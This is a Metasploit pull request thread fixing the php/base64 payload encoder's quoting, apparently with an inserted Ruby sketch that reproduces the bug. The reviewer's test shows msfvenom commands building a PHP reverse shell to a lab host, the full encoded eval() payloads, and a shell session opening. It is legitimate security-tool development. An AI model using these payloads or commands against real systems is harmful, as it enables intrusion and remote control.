Fix php/base64 encoder #19376

Merged
merged 1 commit into from
Aug 26, 2024

Conversation

@jvoisin (Contributor) commented Aug 9, 2024

Having things like `'abcde.chr(43).fgh'` doesn't fly in php, but `'abcde'.chr(43).'fgh'` does.
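As an added example (not Metasploit's encoder code), the Ruby sketch below emits both quotings and round-trips the result the way PHP would, with and without the Compress option mentioned later in the thread; `php_base64_stub`, `eval_php_concat`, `php_would_run` and the `<?php echo 'ok'; ?>` sample are all constructed here.

```ruby
require 'zlib'

# Constructed stand-in for the encoder's output stage (not Metasploit's code):
# base64 the payload (zlib-compressed when `compress:` is set, as the PR's
# gzuncompress() wrapper implies), splicing '+' and '/' out as chr() calls.
def php_base64_stub(payload, fixed:, compress: true)
  data = compress ? Zlib::Deflate.deflate(payload) : payload
  b64 = [data].pack('m0')                       # strict base64, no line breaks
  parts = b64.scan(%r{[+/]|[^+/]+}).map do |tok|
    case tok
    when '+' then 'chr(43)'
    when '/' then 'chr(47)'
    else fixed ? "'#{tok}'" : tok               # fixed: each run gets its own quotes
    end
  end
  # buggy: one pair of quotes around everything, so chr() becomes literal text
  expr = fixed ? parts.join('.') : "'#{parts.join('.')}'"
  decode = "base64_decode(#{expr})"
  "eval(#{compress ? "gzuncompress(#{decode})" : decode});"
end

# Evaluate the argument as PHP would: a '.'-joined sequence of single-quoted
# literals and chr(N) calls. Text between quotes is literal, which is exactly
# why the buggy form leaves ".chr(47)." sitting inside the base64.
def eval_php_concat(expr)
  expr.scan(/'([^']*)'|chr\((\d+)\)/).map { |lit, code| lit || code.to_i.chr }.join
end

# Round-trip a stub: returns the bytes PHP would hand to eval(), or an
# "error: ..." string. Ruby's strict decoder rejects the stray '.', '(' and ')'
# outright; PHP's lenient base64_decode() drops them, so the failure shows up
# one step later as the gzuncompress() "data error" quoted in the PR.
def php_would_run(stub)
  inner = stub.delete_prefix('eval(').delete_suffix(');')
  compressed = inner.start_with?('gzuncompress(')
  inner = inner.delete_prefix('gzuncompress(').delete_suffix(')') if compressed
  expr = inner.delete_prefix('base64_decode(').delete_suffix(')')
  decoded = eval_php_concat(expr).unpack1('m0')
  compressed ? Zlib::Inflate.inflate(decoded) : decoded
rescue ArgumentError, Zlib::Error => e
  "error: #{e.message}"
end

if __FILE__ == $0
  sample = "<?php echo 'ok'; ?>"   # constructed sample; its base64 contains a '/'
  [false, true].each do |fixed|
    stub = php_base64_stub(sample, fixed: fixed, compress: false)
    puts "#{fixed ? 'fixed' : 'buggy'}: #{stub}\n  -> #{php_would_run(stub).inspect}"
  end
end
```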
@jheysel-r7 (Contributor) commented Aug 26, 2024

Thank you for this fix @jvoisin! I tested this PR in conjunction with #19377

Verified that the previous implementation generated php that did indeed not fly

➜  metasploit-framework git:(18ee2cde77) ✗ ./msfvenom -p php/reverse_php LHOST=172.16.199.1 LPORT=4444 -e php/base64
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 1679 (iteration=0)
php/base64 chosen with final size 1679
Payload size: 1679 bytes
eval(gzuncompress(base64_decode('eJztVm1v2zYQ.chr(47).p5fwRhCKHeabaXBti7TlqBIsWJu6yXph6ErWJmibCYyqZH0kqDdf99RbyYldykw7NscxLLvnjvey8M7I4TQ9MkPP5XrEp5Ppgeoep0xpaQiipVSGS5W4Wx8eqaZIYZvGCn4hptKxFdCKka2mimSLgEbxlYqOAFwiDfpPWH3jG4Nl6KyxRGYNYcEGddJBV5ZMHxLlwUj.chr(43).VZQi9e4Q.chr(47).I8PGSb0jyE1mY8.chr(47).tjIGx.chr(43).lYisba5FSFuLpuwi9.chr(47).2qKI.chr(47).tX4U99OLsvC5kB8jP6VKn0gWzSMsRG8U0P9BcrNPu4xyLcQZpn9Qh4mWaZSnD87fEk.chr(47).mYSP3s2iXENDWx5kxN4nR4ctIm2.chr(43).UPluDY6xPxSqfnb.chr(43).chr(43).x8sXj1J95l3wKRBwgD6tRnVchlWlRR7rLsqorCF.chr(43).fzqwt0mCRIQ67wHy5.chr(43).XpA3VxHCd1xgNB4jJ1eaBHQyQsc.chr(47).HsW.chr(47).i1E.chr(47).3eBXOv.chr(47).t5mWCuSY0LQrbTdw1.chr(43).1bmNw.chr(43).XoBSkKlen2fW4cRBivWZFUTEHj4.chr(43).ODhtbTx4NmCCTDwH94LVpj.chr(43).tSlkz4XmvR0GFeJpUKKhphhV2ayOT12.chr(47).l8J4ATIGnFtNwq4CCYup4QulvzgkFrmcyHSutvkuSKpZlVRvHs.chr(43).MQ5bFdg99NZSQup66MezTnV2qzVtpd2Kx1kLpdEmxQusxNFi7b08goBYLi.chr(43).hEphmAC6OlpQMZERWrBUhI9GOWz3Zxvdu28IWaRtUyD94G4kFyFdqzCeja1y0nx.chr(43).LBb9oA3b9MhXy76oWjX2v6tVqSQle5jciYdVW6ciK1jSQWy56jrW77jkJYxnS.chr(47).TIl9ztk0A57Rf9T7fCY32Ffhe.chr(47).97nvML8F9Pnvct4G3.chr(47).C.chr(43).zmdvpTyuzPwx1akUM1slAOHr6.chr(47).dASDtd.dYKFrMiFdlvptJ3UzpgLca4lva07AoEdtlPOVfR6EsDy65ThyNDy.chr(43).chr(43).nUXRKjqNoPXYp1OWEINwXT0fHs5Dv.chr(47).amwNShDG3mTS26Ud7NDvWfR0jGDWY5oh7PWBrjOuHOTT6Ot47DYB2fpWK8N1d1K7.chr(43).2PLDUafPqE9OthiBrtbBKElxH.chr(47).r.chr(43).PY3ap1G4i8117EfWX0xrEWS5Cl46s3W.chr(47).E5xw2y12qZ6xoNo9o9bxwscNdj0eUPK1reXkm207bO9.chr(43).XAWuDl.chr(47).QV6.chr(43).vriOrt48.chr(47).4VcXV9enL.chr(43).Cz3Ny.chr(47).XzRue5MpBCMmuro.chr(43).qdEjxYtsItw5B02GvKntfifRl9Oo0GV.chr(47).w2bhs7g4AgiK.chr(43).xctgQbMKyjQ49oB38DIw8ZMA')));
➜  metasploit-framework git:(18ee2cde77) ✗ vim shell.php
➜  metasploit-framework git:(18ee2cde77) ✗ php shell.php
PHP Warning:  gzuncompress(): data error in /home/msfuser/git/metasploit-framework/shell.php on line 3

With these changes the php/base64 encoder now generates a proper payload with or without the Compress option set

➜  metasploit-framework git:(18ee2cde77) ✗ ./msfvenom -p php/reverse_php LHOST=172.16.199.1 LPORT=4444 -e php/base64
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 1715 (iteration=0)
php/base64 chosen with final size 1715
Payload size: 1715 bytes
eval(gzuncompress(base64_decode('eJztVm1v2zYQ'.chr(47).'p5fwRhCKHWabaXBts7TlqBItqJuEizeMKwrWJmiY7YyqZI0nKDtf99RsmRScpYCw77Nhi357rnjvTy6M0IIjZ788FO5LOH6ZHSAqtcpU0oqolgpleHiNhxHk1PNDDF8xUjBV9xUIn4rpGJkrZki2RywYWKlghMAh3iV3RF2x'.chr(43).'jacCkqWxyD2faQIOc6rcC3Fgy'.chr(47).'snnByGItqMVr3CL5Ijxkq9Lch9Ymij5u5VsfpWK3NtYioyzEo9cxevPVCMf2XeEnPpzdlYXMAfmAPlMquyerrAyxUXzVAX1mhWYf91iEO8j2Wl0CXmZ5rlKcfHs8TL4ZJs'.chr(43).'eDRNcQwNb3vQEXpODgybRJn'.chr(43).'oHNdGh1hLLWb5TG4u8C71BoV22jCgTmVuCznPiiq'.chr(43).'XX5tPVF4cTa9OUeHaYo0ZAmf8PqXa3J1EyO84QKjKEJOljQN6HCAjn88Sv4Sg26iwR90'.chr(43).'nOKuSY0KwrbRdw2'.chr(43).'ZW5'.chr(43).'vDn5e'.chr(43).'gFaSqU6vaNbeyh0SXrCgqwuDo6OiwMfUUcY8BMn0b0Ldee3qey0xrs1Trjt9W3PMq50SbDPjskKNB2zpP3PMBDAwmVArDBHTM0YKKiZzQgmUijB4JUklKZMlEN8pW3k9'.chr(43).'mYm8YGkLgdjimo31Ny55CQ8dVjiKfclmnySKA'.chr(47).'tD'.chr(43).''.chr(47).'ld'.chr(47).'jad7gSbJS8Y0JRJiLxCv07euEFZm2G6UCzLd4A4GR'.chr(43).'fOG4'.chr(47).'t3enVfC0kJqF23weKZS'.chr(43).'14atuhyphV'.chr(47).'UyRr7X'.chr(47).'VxD4EfpG5nciBkkbaJgfRjeye5COlShck4ssrh9v4RSu2j0wNUWpRp2VDI8uUfKAAHwLOumJZrBSMXTP3'.chr(43).'exTpKj16LMouMVxquCTZEgS87UvZK'.chr(43).'rYn0'.chr(43).'tSjGzVgIQvr7'.chr(43).'DoS0M1WnWMiq.C2i3iCbNcHYmXIgXWtL3dYGBtYfNfHMVnSoHsO9aZTgwtPx'.chr(43).'NHL3wiCuVkKbYl1ImL7bcun4eHzync'.chr(43).'htUEpwtjrjl7P7USHTo7jpxGCIY9pjrDXB7rMuXKQT'.chr(43).'Ovk8h9QpGtb7UrXHcntbsPa24w'.chr(43).'vQJ7dHB4jLYXR8IzSH'.chr(43).'945vf4nWaaTOKnO9'.chr(43).'mHV9LbwNF1k4KZDrsVGccNsqZqOesa9UPbzzfECR'.chr(47).'U2'.chr(43).'2LLxsa3l4'.chr(47).'tsm2yHSVwFrg5uyAvLs9n8c3V85fkZvbr'.chr(43).'dkruJ'.chr(43).'S2fPr1nVrIoVg1FRH138dOpxogG2EA'.chr(43).''.chr(43).'wQZ88jcX'.chr(47).'HPpCDvVK'.chr(47).'G'.chr(43).'o1HcGB8cQWWFnrWVXj14tFzosO'.chr(47).'gbCuwRMA')));
➜  metasploit-framework git:(18ee2cde77) ✗ vim shell.php
➜  metasploit-framework git:(18ee2cde77) ✗ php shell.php

The handler receiving the payload generated above:

msf6 payload(php/reverse_php) >
[*] Command shell session 2 opened (172.16.199.1:4444 -> 172.16.199.158:36264) at 2024-08-26 15:49:05 -0400
msf6 payload(php/reverse_php) >
msf6 payload(php/reverse_php) > sessions -i -1
[*] Starting interaction with 2...

uname -a
Linux ubuntu 5.15.0-92-generic #102~20.04.1-Ubuntu SMP Mon Jan 15 13:09:14 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
php -v
PHP 7.4.3-4ubuntu2.19 (cli) (built: Jun 27 2023 15:49:59) ( NTS )
Copyright (c) The PHP Group
Zend Engine v3.4.0, Copyright (c) Zend Technologies
    with Zend OPcache v7.4.3-4ubuntu2.19, Copyright (c), by Zend Technologies
[*] 172.16.199.158 - Command shell session 2 closed.

@jheysel-r7 jheysel-r7 added the rn-fix release notes fix label Aug 26, 2024
@jheysel-r7 jheysel-r7 merged commit e0037fb into rapid7:master Aug 26, 2024
40 checks passed
@jheysel-r7 (Contributor)

Release Notes

This fixes the php/base64 encoder which was previously generating php payloads that were failing when being run due to the way single quotes were being inserted into the payload.

@egypt (Contributor) commented Aug 27, 2024

A big part of the original design for this was to avoid using quotes. If we already have to quote everything for modern PHP without bareword->string conversion, this whole encoder can be greatly simplified by cutting out all of the chr() replacements as well as the splicing to get around the character limit for identifiers.

@jvoisin jvoisin deleted the fix_php_base64 branch August 27, 2024 11:19
@jvoisin (Contributor, Author) commented Aug 27, 2024

> A big part of the original design for this was to avoid using quotes. If we already have to quote everything for modern PHP without bareword->string conversion, this whole encoder can be greatly simplified by cutting out all of the chr() replacements as well as the splicing to get around the character limit for identifiers.

That's the plan, but I prefer small commits :)

@jheysel-r7 (Contributor)

Thanks for chiming in and providing context @egypt, it's much appreciated.

Thanks for having a plan in place @jvoisin, I'll be keeping my eye out for future improvements.
